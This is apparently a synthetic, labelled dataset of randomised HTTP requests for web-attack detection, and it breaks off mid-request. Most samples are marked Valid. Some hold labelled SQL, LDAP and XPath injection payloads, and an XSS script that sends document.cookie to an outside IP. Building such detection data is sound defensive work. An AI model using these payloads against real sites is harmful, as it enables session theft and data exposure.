Accept-Encoding: gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 120.53.171.153
Cookie: ou=ulraWbB7;u9otaoP=7729;F9ott3diseand=t@eOhutyaab i~Tiz;gUaoensblldOfb=894088141;sryo8oegapnxi=orwa
Cookie2: $Version="7"
Date: Sat, 20 Jan 07 05:54:14 GMT
ETag: W/"JxAv7iRLC-MqteBP"
Expect: glace
From: aEie@aeme1v.biz
If-Modified-Since: Tue, 05 Feb 08 04:49:52 UTC
If-Unmodified-Since: Sun, 11 Jan 04 19:53:56 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic ZG9lUmE6ZW1ld2M=
Authorization: NTLM aW9zNW5zMW1lTmNscnRkbW9vaW5hcWVpZVRyNW50bHRpc29zUmg4c3Vh
Range: 1-,-972493
Referer: http://eiIs1.it/leeoae/tcgtskb/nrtia/Bhoynon/5tlEt.jpeg
TE: trailers
Trailer: User-Agent
User-Agent: teiHurshnnk
UA-CPU: PowerPC
UA-Disp: 664,7142,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 8293x354
Via: 9.0 www.rybpurtr.css:5, 2.3 www.neddt8iE.gif
Transfer-Encoding: compress
Upgrade: yyiKl/3.7, it7/7.9, ehn/2.1
Warning: 469 180.84.229.18 "oEiemdthie3uEjrey" "Sun, 17 Dec 06 24:08:21 CET"
X-Forwarded-For: 185.82.248.52
X-Serial-Number: 900444
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 21257
Start - Id: 42718
class: SqlInjection
POST /azoydqaF1se4oi0tu9t/t0.acUC5rQK/0dtA7/tegoEoaOtS7yzoneN/jYFTQpwQPbU.css? HTTP/1.0
Content-Length: 235
Content-Language: ikx
Content-Encoding: compress
Content-Location: /ge8EeI/mnjec/edHkl/untrL.php3
Content-MD5: cm90czMzb3N0YUV0aXJzeA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Jul 09 24:04:33 CET
Last-Modified: Sun, 13 Dec 09 20:50:49 CET
Host: 180.180.241.190
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.7
Accept-Encoding: OR     'ai'  IN   (  '  ')
Accept-Language: Oub-ods1;q=0.3, ksrsomjs-ne;q=0.2
Cache-Control: no-store
Client-ip: 219.49.82.123
Cookie: rlSohdaUoruOo=yN
Cookie2: $Version="5"
Date: Fri, 26 Oct 07 16:33:30 CET
ETag: W/"odG_UuhURbC8L3RQxq"
Expect: 100-continue
From: antuRxll@nMLok.net
If-Modified-Since: Thu, 04 Aug 05 13:52:13 GMT
If-Unmodified-Since: Mon, 06 Mar 06 01:49:12 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 47
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic YWVwbmRzOmZuZ3NuZw==
Authorization: Basic YWVydHJNaXQ6dmdoQXNsdG8=
Range: -898507,84084-5
Referer: http://oh3rsli.biz/fdembhes/teeeg/prroea/emfol/n82m8eo.sh
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: 0WNMCypjdx http://www.0ljohn.cz
UA-Disp: 966,2764,32
UA-Color: color16
UA-Pixels: 051x950
Via: 1.7 www.sf9Hr.shtml
Transfer-Encoding: gzip
Warning: 248 64.93.227.168:634 "DanimetRfrErrctntc" 
X-Forwarded-For: 37.5.190.170
X-Serial-Number: 31876776688565711
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ifnyatelnNmqee=0849&etmoOstti= $i&srh=0805481&aphttoaLi4=g$e eaaEni&RO8enke=ndd2t4osundwc6bt&nsrad0=svdoptldfctqEH)p&tnS=gZeGBNCJ1L&tgt=aeceaanEpvo&uorwr7orowU=803152&gs081aul7tnr=564&pKylUc=4&alit=6&eze=rEcg0olxlsxhurs/&kkdw=4

End - Id: 42718
Start - Id: 304
class: Valid
GET /luRimTut8rtrxls/oteeeylssiamaTcras/ts.sh?mRn6exgitS=446408&en1uo=590548651&oOjoJwdszcle=dpmi&ww4up=19&s9e=0190&rkcnciPm=s5EWNeXDJf&tosode=15343&XUWu.l4D4=945&mI3D92ut=4813460&bsut=2&anjIiaan7tnores=6or0twtkEaaRq&ruhsndnot61e=cnWer%2Bnc HTTP/1.1
Host: 185.140.218.249
Connection: q2obi
Accept: */*
Accept-Charset: macintosh, x-mac-cyrillic, windows-1250;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 157.214.192.75
Cookie: sesgls7uqiYieae=41828528;4fnpn79isicte=81;LGmail-m=chgtio
Cookie2: $Version="39"
Date: Wed, 24 Mar 10 03:53:09 GMT
ETag: W/"5I-t-ACF@We_@x@jrE"
Expect: hsid=mDi4e;ogic=7lnnlaoi
From: atOG@okZhh.fr
If-Modified-Since: Sun, 24 Dec 06 02:25:02 UTC
If-Unmodified-Since: Mon, 08 Dec 08 12:04:10 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: ye6h yMsthsrA=atyake
Authorization: Digest algorithm=MD5-sess
Range: 018198-760671,-91
Referer: /enOTjtr/9ght/h8gn/da3ih.pl
TE: chunked;q=0.5
Trailer: Authorization
User-Agent: Mozilla/1.0 (Machintosh; U; PPC Mac OS X 9.5; iW-en; rv:3.8.4) Gecko/67583722
UA-CPU: x86
UA-Disp: 2593,723,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4622x2387
Via: FTP/6.4 236.253.244.214, eHEras/5.3 94.149.80.251
Transfer-Encoding: identity
Upgrade: miT2r5/5.1
Warning: 753 172.218.58.231 "ldoa" "Wed, 20 Apr 05 05:59:53 UTC"
X-Forwarded-For: 127.92.165.64
X-Serial-Number: 94210
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 304
Start - Id: 46859
class: XSS
POST /9WFf-miEfBlP/aeasLl/s7liLmes7o/oQB6M5sjKjDd/9srlN0i7ot/a2dcFsiE2GcGRYZP6bf/JZQ8psC6execlFPH0U/Ehdpt/em/uii.mspx? HTTP/1.1
Content-Length: 419
Content-Language: a
Content-Encoding: deflate
Content-Location: http://www.es5L.it/f1reGsPw.mpg
Content-MD5: b2ZPdERuZU90ZUFyZm40cg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Mar 04 16:45:32 UTC
Last-Modified: Tue, 06 Nov 07 18:16:10 UTC
Host: www.sSjs.net:930
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 159.108.183.118
Cookie: i8whe=9262271130;rhttqp8ekioiii=909946;ia3auhsEt=3tTs4 
Cookie2: $Version="134"
Date: Mon, 02 Oct 06 10:04:00 CET
ETag: "uE9hA1criXVuwur"
Expect: ascq
From: eisopAa@s6qldnnaej.be
If-Modified-Since: Sun, 03 May 09 20:25:55 CET
If-Unmodified-Since: Thu, 25 Mar 10 22:18:32 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2853
MIME-Version: 8.9
Pragma: khw=tsIeg
Proxy-Authorization: Basic Z2lleDplZHNvZHc=
Authorization: 30Mi x2Ljsisl=rnolxb
Range: 6262-,10870-70169
Referer: http://www.6soec5E.uk/oahsyqBf/ntap.php
TE: gzip,trailers
Trailer: Referer
User-Agent: uGvtytSpc (rC.1xwai; tjsFfyWBck; ai-jm@p)
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 758x384
Via: FTP/9.3 www.pytiscf.jpg
Transfer-Encoding: gzip
Upgrade: ccSen/7.1
Warning: 762 95.205.191.87 "fohr1e" "Mon, 03 Aug 09 24:53:41 UTC"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

vdtuabetdnoh=eauc&xpakuel8qruh=/e o&ibuCcinr=s3VKWpvWPXw&atltnT=02226395&oeosrdesna1sdah=<![CDATA[<!--]]  ><script   >[window.open('http://38.247.36.29/icgech.bin'+document.cookie);]//--></script>&atpaieRown3tuo0=4m  &6dfrettMn8hioh=edtt0IeZuTwc0eo&tso7eer5=q&2pn_98Iu=193&binhiq1o67=tCsrRsebH&onfoeCrogaeata=Tee&HOf6b8mailv@_=is=t&lFhhlncqmldl=o6tlRq1lgfhf

End - Id: 46859
Start - Id: 22792
class: Valid
GET /.@XZKnoGUSv/dti9hrpMiif/lhDslf.mu/iNTZTIh3/tetuii6H/tT.pxg/la1Nitoceoee4am/uoRs/nYLG5/nfxZSD/JserAojhghg0zhH62e/an5HetMiat.css?Ri7deqe=or0a&fwiraeB=rsock_stream&8d8s9L=aaebuhoaHe0hpyj&ehe=soTru%3Ae&BY017c=etil1xC4yE&IBGvj=+s9q HTTP/1.0
Host: www.9eimuy1.st
Connection: close
Accept: */*;q=0.3
Accept-Charset: windows-1255, us-ascii;q=0.1, windows-1253;q=0.6, iso-8859-2;q=0.2
Accept-Encoding: compress;q=0.6, compress;q=0.4, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 227.73.123.190
Cookie: eaibro9cEee=5;h2StgtdgL=19079;ssa=sEk;41eQ=88756915;eormrm=aacceptw6nor9ejai6etelnet w '0perl
Cookie2: $Version="225"
Date: Tue, 30 Aug 05 16:07:30 UTC
ETag: W/"eKu6h5Nl2CjgMZnjC32"
Expect: 100-continue
From: woeof@7mnni.de
If-Modified-Since: Mon, 08 Aug 05 17:20:05 CET
If-Unmodified-Since: Tue, 01 Dec 09 13:41:46 UTC
If-Match: "om3j4xXZFmvmxOI4Db"
If-None-Match: "GXK3l3DpB0o.aWGX31N"
If-Range: "@tufVRRaapu61oekEoAp"
Max-Forwards: 983
MIME-Version: 0.5
Pragma: ssY9soh='d8edis'
Proxy-Authorization: Digest nonce
Authorization: Basic anJyc3hpc3Q6dGVsbA==
Range: -637
Referer: http://ttrdgowi.it/cMtm/r8laxAoo/eTntbij/eirul/4j4f9lo.cgi
TE: trailers,gzip;q=0.9,trailers
Trailer: If-None-Match
User-Agent: oyFdcu/7.8.9
UA-CPU: 68000
UA-Disp: 9973,4219,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 396x8159
Via: 0.0 228.47.143.177, 4.8 76.90.163.113, u4Stm/1.8 www.o1a5tO.html
Transfer-Encoding: deflate
Upgrade: zuf/1.3, ons/6.0, ctn/4.8
Warning: 885 www.tedi.jpeg "soelhnre6erIg2cgg6" 
X-Forwarded-For: 147.118.27.36
X-Serial-Number: 058187169230158
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 22792
Start - Id: 38991
class: LdapInjection
GET /QsCYupdateN/-0Q/8uiEgkocedepye/hJAinaFm1r5jYRNFvM/8sqNo/@P9kPhbf/yzsVR7n3YbKqjmC/df/uu0Pe__C/riwonhefs3n/afi4uwnay.mspx?K0miwai23S=7195&hcnsmmeOer=02188&rfgremin=i&sma=tR9L9YDa9Osn&gjXwXFZpEl=9K2di&y4waAniIt7=31%29%28%26%28objectClass%3Date%29%28%7C%28sn+%3D+++en%29%28cn%3DP++++J*%29%29&estoS4=ev6brJ63gsx&_pRh@AOil9N=lgn3it&TrnyioKs=cher&imgLcdocumentos%uIxi=W+tesdh%40&OPIyimgnWiOdocument4D=bzQoB HTTP/1.0
Host: www.artRnEsA.uk
Connection: A73H
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ahft9T5-c, i76teuwe-t, d-oogadl;q=0.2, riY-ninms7e;q=0.4, hgwtg-8h;q=0.8
Cache-Control: no-cache
Client-ip: 223.192.79.45
Cookie: nslr=sewt;OEe1Ka6NjyoY=r9sh-e1e';ikctrg8o=18224;deEHoacnsEeioas=25853
Cookie2: $Version="51"
Date: Sun, 18 Feb 07 05:47:22 UTC
ETag: "9iXp@tJghwelCND"
Expect: 100-continue
From: nuirrts@cnoeRGT.ch
If-Modified-Since: Wed, 10 Mar 10 10:20:54 CET
If-Unmodified-Since: Thu, 01 May 08 24:59:05 UTC
If-Match: *
If-None-Match: *
If-Range: "mswrVjepbj3FJ48Gp9O"
Max-Forwards: 2
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic dlliYjpuaXNk
Authorization: NTLM cmM2RmFwZTF4cGt0c3NFQU9xaVdydGh6T2VhU292cXM=
Range: 2-,-247703
Referer: /e9ayA/iesasp.jsp
TE: trailers
Trailer: Range
User-Agent: Mozilla/1.5 (compatible; MSIE 3.7; SunOS sun4u; ddte2a8m)
UA-CPU: MIPS
UA-OS: Windows NT
UA-Pixels: 8193x847
Via: HTTP/6.7 176.17.248.123, 9.3 www.vbhw.jpeg, 4.4 www.dnsR3he.js
Transfer-Encoding: compress
Upgrade: ir0/8.9, deh7/6.4
Warning: 690 www.hd6EutI.tiff "hneytet" 
X-Serial-Number: 95673
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38991
Start - Id: 32821
class: Valid
POST /ik9HfNBK1vs/n.w@fFaSB.F9KR/vlsoegsdne/leio/ltPanetix4eyn.tiff? HTTP/1.1
Content-Length: 270
Content-Language: 2zeu,1eoecciE,crZed3E
Content-Encoding: compress
Content-Location: http://c5buei.be/nEiM/sotR30S/os5turaa/noDirhke/7arl.ace
Content-MD5: ZHJoZWFsc1NoZWtiR29MNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Aug 05 06:12:38 GMT
Last-Modified: Mon, 19 Jul 04 09:55:44 UTC
Host: www.bulmr.net
Connection: gs6tA
Accept: */*
Accept-Charset: isiri-3342;q=0.7, iso-8859-9;q=0.9, iso-8859-1;q=0.9
Accept-Encoding: compress;q=0.8, deflate, compress, compress;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 238.106.183.32
Cookie: saeexsduSmadPo=eUKh
Cookie2: $Version="8"
Date: Fri, 20 Oct 06 07:18:23 GMT
ETag: W/"iRufFcS72UWokGj5DLo"
Expect: ia7jRn=hs8ezaSh
From: ci0lcoo@or8ttw.ch
If-Modified-Since: Mon, 05 May 08 24:01:03 GMT
If-Unmodified-Since: Tue, 20 Sep 05 24:54:09 CET
If-Match: "tfG0XH.MBv.gsw1ZFhz"
If-None-Match: "UpFiFZ3Qa_QHLzt2anyD"
If-Range: Mon, 28 Feb 05 24:17:12 CET
Max-Forwards: 49
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: 1e5et aieatut=rah4tea
Authorization: NTLM cmRzYXRqb3R5ZmVhdGU5YWRyZkM1aWRyZWFUbWhhd2FSRTYyOWRpdA==
Range: -92,-97
Referer: /rouelu.wav
TE: gzip
Trailer: Trailer
User-Agent: Mozilla/4.1 (Windows; U; Win98 8.8; qs-te; rv:5.0.0) Gecko/19782022
UA-CPU: 68000
UA-Disp: 6288,1100,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1238x1114
Via: FTP/3.5 www.rvtIrriP.shtml
Transfer-Encoding: dAdge; ufoLa=eswge
Upgrade: a1gnfr/1.8, dT1/0.1
Warning: 175 www.sl7Ocpt.jpg:342 "0uw6Ne" "Fri, 08 Feb 08 18:17:21 CET"
X-Forwarded-For: 149.185.179.218
X-Serial-Number: 6352677
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

metaVmN=r\rrs-tho2a&meoy=lranoHse7eHe&atmw=600&hvrf92eo=pkX1aX-80rM&typrocessing-instructionbinEa=w7dtdtltmpf1N9&arltnRftobttn=tnu&uitmgraad2=nullAtKcre76et:nncd&9Z0dfylvTtelnet=ouUt_dSv3@&Lscript3window.open4replace=133&iestrgeN=6&bEae=357824156&Zusrs0DA0=7653922

End - Id: 32821
Start - Id: 23738
class: Valid
GET /qfHzqcdx6JOP51Tk9tm/yZFrfaaY07.urXnwU/DSRGO8VaOpX6xp_/iimtjmsqnh/cstte9rtsi9eshgrnn4P/wATle4cV93Cn4DCLud/c7YU9WFvGF5JF/traNt3ceaf9tdfswsH/UtxTrpy6MGg9ITo/prztesos5/cuehegO8aSih/7d3dlIahibduioewf6.tiff?cecge5ae=93831010&gdWBqSEgLexecbwindow.open=bhplhttps&dilou=tf2rsnm HTTP/1.0
Host: www.iaumprn5h.st
Connection: close
Accept: application/x-tar;q=0.4, application/*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: eoraB-n, ir2o1i-e;q=0.3, eiejad-dxmqao
Cache-Control: max-age=00
Client-ip: 28.162.219.37
Cookie: 2FjE.3=aJ2CN7-MyB@B;hneRitohleS=i~updatetc;iad1etlr=lte y;s3cCtdeel79s=snullwoBUa;h1=oe0nph-]aarsO9o;tagodaneaiSSHwl=0
Cookie2: $Version="629"
Date: Fri, 06 Jun 08 07:00:01 GMT
ETag: "gO4I8WrBpRND5FgN"
Expect: crro
From: tddnc@aNensle3pe.org
If-Modified-Since: Sun, 31 Aug 08 14:48:27 CET
If-Unmodified-Since: Sat, 19 May 07 08:55:39 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 28 Feb 09 09:23:36 GMT
Max-Forwards: 61
MIME-Version: 1.5
Pragma: arwuTt=arRh
Proxy-Authorization: NTLM YTJ2Y2Vtc29wdGF1bWZlaWRtaGUxZmVvc2RvdHdnYUFpcg==
Authorization: Basic bmF0M0xkOkl3ZWFh
Range: 20-,-643631
Referer: http://www.7cdu.org/onltnkaa/risdSr.cgi
TE: trailers,gzip;q=0.4
Trailer: From
User-Agent: Mozilla/0.0 (X11; U; Open BSD i586 8.2; eh-pn; rv:9.5.4) Gecko/70190872
UA-CPU: StrongARM
UA-Disp: 026,890,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 431x276
Via: Ttb/4.9 www.banets.gif:8002, HTTP/9.3 www.shysbOn.js
Transfer-Encoding: deflate
Upgrade: Oias/7.2, yee/0.3
Warning: 843 www.wgspyi.tiff:2 "uardrdnasUfstccn" "Sat, 28 Aug 04 22:14:21 GMT"
X-Forwarded-For: 96.18.53.61
X-Serial-Number: 13224
----: ----------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 23738
Start - Id: 19990
class: Valid
GET /hY/eNaFdXqc2svR@sK_G/gnktodtthbauyytG.cgi?Omsat=d%28%3BRnRzq%3Bshutdown+nJ%25eiv%29&vnwdrlT=mZbIcv5yh7&uacoeoultl7=xNSvp&cLaccess_log4x-iE=5c&eOei=j&6ml4yaWcceW3b=mUea%3B&5tornEl9uqx=%5D%3A&k8coqtr=5382562&Edelete_UlGEeNJopenG=ateenyxay6te&yatthwggHj2ati8=a6k%407EQ19da HTTP/1.1
Host: 241.217.41.175
Connection: tdelO
Accept: application/*, text/plain
Accept-Charset: utf-7, shift_jis;q=0.7, cp-950, cp-932;q=0.1, iso-8859-7
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 1.248.95.139
Cookie: tdlafqlnt81f=tpWrTeaaO8;eahTnjto=styleer aad piad
Cookie2: $Version="89"
Date: Sat, 02 Jun 07 18:22:39 UTC
ETag: "3iVJchcz332gZ6_Q"
Expect: 100-continue
From: z3on9@atfseid.cz
If-Modified-Since: Mon, 14 Jul 08 13:12:25 UTC
If-Unmodified-Since: Wed, 26 Nov 08 07:50:35 UTC
If-Match: "uln0kRNkxjawC0hkGxWX"
If-None-Match: "rZDQi@oTX@bR2EUS4k"
If-Range: Tue, 05 Oct 04 07:15:09 UTC
Max-Forwards: 3923
MIME-Version: 5.2
Pragma: Iftqoe='sa5Uadb'
Proxy-Authorization: saasm Bhhq=rsbnXfm
Authorization: fVtifb z6sasiD=Nrae
Range: 2515-,-14,1-75
Referer: /edYeain/ihohej/itamhaup.php
TE: trailers,chunked;q=0.8,gzip
Trailer: Range
User-Agent: Mozilla/8.4 (Machintosh; U; Mac OS X 5.4; aw-rw; rv:1.2.7) Gecko/25941986
UA-CPU: MIPS
UA-Disp: 162,7111,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1394x7760
Via: 5.5 89.42.84.106:3247, HTTP/5.2 10.62.203.151, FTP/2.2 11.27.156.252
Transfer-Encoding: compress
Upgrade: fuse/0.1, nec/0.2, daue/4.4
Warning: 177 www.at8ajuht.css "brespotrx" "Sun, 04 Jan 09 15:35:14 GMT"
X-Forwarded-For: 39.120.128.67
X-Serial-Number: 81008512960196254
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19990
Start - Id: 20118
class: Valid
GET /flisLUZ3ZUwvcxp/hedhCobdensc5/6gI07OW/eii0LvnnreaEtt/6t8lreuhaiwA.cgi? HTTP/1.0
Host: 235.79.181.147
Connection: close
Accept: video/*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=93657
Client-ip: 246.3.229.109
Cookie: ff=edsedeoE+lE;eo3ntdnuqdb=b<@ne Y;uSelt=bJ0LmIODHV;dmtic=3VjFZ
Cookie2: $Version="81"
Date: Wed, 04 Jan 06 21:59:53 UTC
ETag: "zn.IiEeDfV_qRyqiN"
Expect: 100-continue
From: t261O@oawcrm.be
If-Modified-Since: Mon, 27 Sep 04 05:55:26 UTC
If-Unmodified-Since: Mon, 14 Aug 06 12:08:27 UTC
If-Match: "iPwl0Zw7uw7w--5"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 9.3
Pragma: coti='weesh'
Proxy-Authorization: 8dgRi tith2yiI=td0ke
Authorization: aoMoA rbnU=YhsEEmt
Range: 41-,-67213
Referer: http://hdsn.com/o8htn/ewNoohn/eErn.cgi
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.1 (Windows; U; WinNT 7.9; 5e-Ln; rv:1.1.3) Gecko/81257216
UA-CPU: Sparc
UA-Disp: 972,951,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2082x0663
Via: s0n/3.9 www.idtzoj2.html:88, FTP/0.2 86.198.29.52, 2.8 161.242.182.213
Transfer-Encoding: eiqrse
Upgrade: bne/0.1, LZsinl/3.7
Warning: 660 www.e06sbm.png:915 "itsTnmtqleDAXa" "Fri, 23 Dec 05 19:02:37 GMT"
X-Forwarded-For: 171.141.7.56
X-Serial-Number: 9909201039312
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 20118
Start - Id: 22881
class: Valid
GET /ep/uo4rllatg/ooAdqbe9lbl/e1unyo3ee4lrditoea/thcsXbtth6/Mrc/8p8d7wIl9OVdEY/nc_OpnaTN9/C8G.shtml?nOinclude5=7092&siT=5UG4V&aen=27803&detdeBRtpa7b=vbR1edhh2to6o&ewGnyeaDImpiK=12&lmo2=hIoKLsm&i6oesme9SbNct=e3gUeyxuinrpra&isgrel1zttpe=9 HTTP/1.1
Host: www.yREQlbhv.gov
Connection: keep-alive
Accept: video/mpeg, image/*, audio/*
Accept-Charset: hz-gb-2312;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: oia4S1-t;q=0.3, ehEnneud-etne
Cache-Control: max-age=343
Client-ip: 5.243.112.159
Cookie: aedtwwe=ros;ceauuiKot=sPXAyO;t6Oyt7vc=06
Cookie2: $Version="915"
Date: Tue, 20 Feb 07 07:13:46 UTC
ETag: W/"FjRAi8E2THaWXBoTN_"
Expect: 100-continue
From: ntsdz@D3mgaa.it
If-Modified-Since: Fri, 26 Sep 08 20:57:04 CET
If-Unmodified-Since: Fri, 11 Aug 06 09:46:35 GMT
If-Match: "8AgeTjzEjdxyt.4v7"
If-None-Match: *
If-Range: Fri, 18 Jul 08 02:31:52 GMT
Max-Forwards: 74
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: sd4kl okfasio=grnoeInt
Range: 37032-5753,-977
Referer: http://yGlm.cz/uRaBkto/epnOoT/Nelswcyr/uevoeatN/nas1Scrg.asp
TE: trailers,chunked
Trailer: Max-Forwards
User-Agent: Ob797swqha (4NaOTp@Rz; gtP-Sl; eP_CJCt; eK91RsD; fPGBWiUE)
UA-CPU: MIPS
UA-Disp: 533,0632,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 301x6303
Via: Rbh/8.6 www.i9hd0go.html, 4.7 193.9.112.182, 1.4 190.111.82.147:3
Transfer-Encoding: ze6d7o
Upgrade: 6ahich/9.0, ixit/2.6
Warning: 312 56.128.98.138 "curonnltfRimjCnt" 
X-Forwarded-For: 49.248.212.8
X-Serial-Number: 426023548
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22881
Start - Id: 35517
class: XPathInjection
GET /aTuoaoogiLoezdbhqurm/a8@0Kwd@k/ybOnJcU/nBD-18L_.png? HTTP/1.1
Host: www.dnoeanr4d.st
Connection: close
Accept: text/*, image/*
Accept-Charset: iso-2022-kr;q=0.6, utf-7, cp-932;q=0.8, windows-874;q=0.4, iso-8859-1;q=0.0
Accept-Encoding: identity, deflate;q=0.8, gzip;q=0.3, deflate;q=0.7
Accept-Language: sis5-srowtag, sTetno-bltde, fIwr3u-a, aex-t3ms0n9t;q=0.6, a1nrooSn-areirh;q=0.8
Cache-Control: no-store
Cookie: esdG=845 or    count(path/child::node()[position()=((i+j+k+l+1)]   |    path/child::*()[position()=(k+1)])=1   or   381=
Cookie2: $Version="419"
Date: Sun, 11 Jul 04 01:40:15 UTC
If-Modified-Since: Sat, 21 May 05 09:32:29 UTC
Max-Forwards: 4
Authorization: Basic bXBrdGVtOmFpZW9r
Referer: /UI6aaeon/mnWloer.cgi
TE: trailers,gzip;q=0.4
Trailer: If-Range
User-Agent: Mozilla/0.7 (X11; U; Open BSD i386 8.6; nt-e3; rv:7.0.8) Gecko/94489722
Via: oel7s/9.0 3.209.25.40, HTTP/7.4 www.ecrpx.png:1, 1.7 www.5wi0m5t.gif
Transfer-Encoding: i2se
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35517
Start - Id: 29636
class: Valid
GET /0ip/NE_logw/@locationy0iMat/oi./ucGP_QOotVNYuAPVM/dfMP9Kdu73yIuWrbF/oklPCfksnLvNipK/NnUSdnullRLa/aeosequ8hbjdahongIE.css?dtslmnous=i%3Ddn&uh9Sro=9yrtrbgsound4ra%27+%3Aetys&qanlrtt7=dAfWkITg&VMLaservicesB0dXALdroph=75698&t8=r7Jr&tonpie=274233&rfm1eesqnesdf=aso5el5xml&eTlrn6dqi=1&KPEq4=eGh9u%40GG2Z HTTP/1.1
Host: www.wneMmvMt.fr:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: koi8-r, x-mac-arabic;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: 4-h;q=0.5, ntdhjto-8lsete, etFn-noaht, hetcseos-2tw8, ht86hal-1c
Cache-Control: only-if-cached
Client-ip: 180.238.202.202
Cookie: 9ttzKeKeJqgs=lRi;Seaeo=kotAeuA7apinVEa;@.evalus=walrtfhisit;9NrmU=05757204
Cookie2: $Version="31"
Date: Tue, 18 Jan 05 11:31:34 CET
ETag: W/"YgrVF1W@QPY1ZGuG"
Expect: 100-continue
From: serlgoma@7stltqn9.org
If-Modified-Since: Thu, 25 Jun 09 15:45:28 CET
If-Unmodified-Since: Sat, 20 Jun 09 11:23:39 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 0.3
Pragma: lmeee=ao
Proxy-Authorization: Digest username="zohhys"
Authorization: Basic dGpyZjptYnUy
Range: -146,1-593943,-3282
Referer: http://www.puhm14g.org/el5gnsmA/esdI.shtml
TE: trailers,gzip
Trailer: If-Match
User-Agent: Mozilla/6.9 (X11; U; Unix 1.0; Ct-ds; rv:6.2.2) Gecko/35848169
UA-CPU: MIPS
UA-Disp: 488,829,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 423x5834
Via: lcu/1.5 242.222.179.46
Transfer-Encoding: identity
Upgrade: tdet/1.8, gtr/7.8, l8sivs/5.8, aedub/5.6, a2nlas/3.5
Warning: 402 www.rtrtomG9.htm "notgi1apft" 
X-Forwarded-For: 193.139.126.154
X-Serial-Number: 41855
----: ----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 29636
Start - Id: 1053
class: Valid
GET /8betweenetc2/dJjux.IOq15fTWItm/s-Z3.VXvMohgGdA3T/qEuVftpUhMB.pl? HTTP/1.1
Host: www.8ohhtp.cz:80
Connection: 7dsgFy
Accept: */*;q=0.3
Accept-Charset: iso-8859-1;q=0.3, iso-2022-jp
Accept-Encoding: identity;q=0.3, compress, gzip;q=0.2, gzip;q=0.9, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 200.111.20.62
Cookie: pitw3eih=611669162;uduemetrchesi=ifY2envv5X0q
Cookie2: $Version="40"
Date: Sat, 20 Feb 10 10:18:49 GMT
ETag: "bJfMYYAOww_oeDEWr8h"
Expect: brrll
From: lSpom@es6vknOma.biz
If-Modified-Since: Thu, 13 Oct 05 22:07:23 UTC
If-Unmodified-Since: Sat, 01 Jul 06 02:11:43 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM aXRyZXNkbzRvcnhyY2VleXR0ZW1ybnNhRXplbnphaTdSNW9SYWVpYmVuNg==
Authorization: Basic ZG94ZThzYXQ6aWhydA==
Range: 46238-
